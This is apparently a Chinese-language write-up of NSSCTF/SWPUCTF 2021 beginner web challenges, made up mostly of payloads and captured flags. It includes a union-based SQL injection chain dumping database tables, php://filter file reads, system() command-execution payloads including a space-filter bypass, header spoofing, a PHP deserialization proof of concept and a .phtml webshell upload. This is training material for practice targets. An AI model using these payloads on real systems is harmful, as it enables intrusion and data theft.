[SWPUCTF 2021 新生赛] gift_F12

NSSCTF 及 LitCTF 竞赛中的多道 Web 安全题目解法,涉及 F12 源码分析、SQL 注入、文件包含、命令执行、反序列化、文件上传等漏洞原理与利用技巧,附带具体 Payload 及 Flag 结果。


点击确定

查看源码

NSSCTF{We1c0me_t0_WLLMCTF_Th1s_1s_th3_G1ft}

GET: json={"x":"wllm"} POST: id=wllmNB

NSSCTF{47e0e900-250c-40d2-8ccf-2fef864d242a}

MD5 弱比较绕过:314282422、571579406

NSSCTF{9668d690-7b6d-42a0-8c20-205dd6b5dc7f}

/?file=flag.php

伪协议读源码:php://filter/read=convert.base64-encode/resource=flag.php

Base64 解密得:
<?php
$flag='NSSCTF{d44702c1-094b-489a-a0ab-50471944f73d}';

字符型单引号。判断列数:/?wllm=-1' order by 4--+

/?wllm=-1' order by 3--+
共 3 列
查看回显位:/?wllm=-1' union select 1,2,3--+

回显位 2,3
查库:/?wllm=-1' union select 1,2,database()--+

库 test_db
查表:/?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="test_db"--+

表 test_tb,users
查 test_tb 表的所有字段:/?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema="test_db" and table_name="test_tb"--+

所有字段 id,flag
查看 flag 字段的内容:/?wllm=-1' union select 1,2,flag from test_tb--+

NSSCTF{e2e3e44f-3751-4545-b48f-4c41818fa887}

查看源码

NSSCTF{cd21a6ec-88cb-46cd-b40f-1d0baa9b785f}

/?url=echo(system("ls /"));

/?url=echo(system("cat /flllllaaaaaaggggggg"));

NSSCTF{80867aa5-b8f8-4ebb-bbe8-d38fb3b5206f}

wllm=system("cat /flag");

NSSCTF{c30de7d3-4048-4037-8bf6-265e61bdc95a}

BP 抓包,将 UA 内容改为:WLLM

要求本地,X-Forwarded-For: 127.0.0.1

NSSCTF{6207b742-51ff-42e3-a012-aede36925162}

按要求传值

访问 rasalghul.php

只过滤了空格,用 $IFS$1 绕过:/rasalghul.php?url=cat$IFS$1/flllllaaaaaaggggggg
NSSCTF{571f2fa9-f820-4245-9f42-c08d6061d016}

标题中提示了 git 泄露

用工具下载泄漏文件:python githack.py http://node7.anna.nssctf.cn:26492/.git/

打开下载完的文件夹,发现是空的。目录扫描:

访问 phpinfo.php

NSSCTF{d7c12238-0701-467f-9ca8-d0a4971e903f}

查看源码

访问 robots.txt

访问 cl45s.php

POC:
<?php class wllm{ public $admin="admin"; public $passwd="ctf"; } echo serialize(new wllm());
Payload:/cl45s.php?p=O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}

NSSCTF{01336073-5e78-4911-a3ee-f7dcbf4846d3}

只过滤了 php 后缀,用 phtml 代替即可。上传小马后,进行命令执行:cmd=system("env");

NSSCTF{cff7743d-5e0e-47f5-a56f-f28896e96f7b}

前端源码中没有信息,查看网络:


在 game.js 中发现 flag:NSSCTF{y0u_w1n_th1s_!!!}

输入 php 代码并执行

<?php system("cat /flag");?>

NSSCTF{cb2166a8-18d3-4c03-83eb-1fbe47d1b2b7}

微信公众号「极客日志」,在微信中扫描左侧二维码关注。展示文案:极客日志 zeeklog
使用加密算法(如AES、TripleDES、Rabbit或RC4)加密和解密文本明文。 在线工具,加密/解密文本在线工具,online
解析常见 curl 参数并生成 fetch、axios、PHP curl 或 Python requests 示例代码。 在线工具,curl 转代码在线工具,online
将字符串编码和解码为其 Base64 格式表示形式即可。 在线工具,Base64 字符串编码/解码在线工具,online
将字符串、文件或图像转换为其 Base64 表示形式。 在线工具,Base64 文件转换器在线工具,online
将 Markdown(GFM)转为 HTML 片段,浏览器内 marked 解析;与 HTML 转 Markdown 互为补充。 在线工具,Markdown 转 HTML在线工具,online
将 HTML 片段转为 GitHub Flavored Markdown,支持标题、列表、链接、代码块与表格等;浏览器内处理,可链接预填。 在线工具,HTML 转 Markdown在线工具,online